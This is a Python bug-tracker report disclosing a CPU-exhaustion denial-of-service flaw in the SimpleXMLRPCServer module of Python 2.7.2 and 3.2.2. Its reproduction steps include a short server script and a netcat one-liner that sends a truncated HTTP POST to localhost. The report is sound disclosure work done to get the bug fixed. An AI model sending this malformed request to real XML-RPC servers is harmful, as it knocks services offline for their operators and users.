New submission from Jan Lieskovsky <ian...@seznam.cz>: A denial of service flaw was found in the way Simple XML-RPC Server module of Python processed client connections, that were closed prior the complete request body has been received. A remote attacker could use this flaw to cause Python Simple XML-RPC based server process to consume excessive amount of CPU.
Credit: Issue reported by Daniel Callaghan References: [1] https://bugzilla.redhat.com/show_bug.cgi?id=789790 Steps to reproduce: ------------------ A) for v3.2.2 version: 1) start server: cat s.py #!/usr/local/bin/python3 from xmlrpc.server import SimpleXMLRPCServer server = SimpleXMLRPCServer(('127.0.0.1', 12345)) server.serve_forever() 2) # top 3) issue request from client: echo -e 'POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye' | nc localhost 12345 Return to 'top' screen and see, how CPU consumption on particular host quickly moves to 100%. B) for v2.7.2 version: 1) start server: cat s.py #!/usr/bin/python from SimpleXMLRPCServer import SimpleXMLRPCServer server = SimpleXMLRPCServer(('127.0.0.1', 12345)) server.serve_forever() Steps 2) and 3) for v2.7.2 version are identical to those for v3.2.2 version. ---------- components: Library (Lib) messages: 153267 nosy: iankko priority: normal severity: normal status: open title: Python v2.7.2 / v3.2.2 (SimpleXMLRPCServer): DoS (excessive CPU usage) by processing malformed XMLRPC / HTTP POST request type: security versions: Python 2.7, Python 3.2 _______________________________________ Python tracker <rep...@bugs.python.org> <http://bugs.python.org/issue14001> _______________________________________ _______________________________________________ Python-bugs-list mailing list Unsubscribe: http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
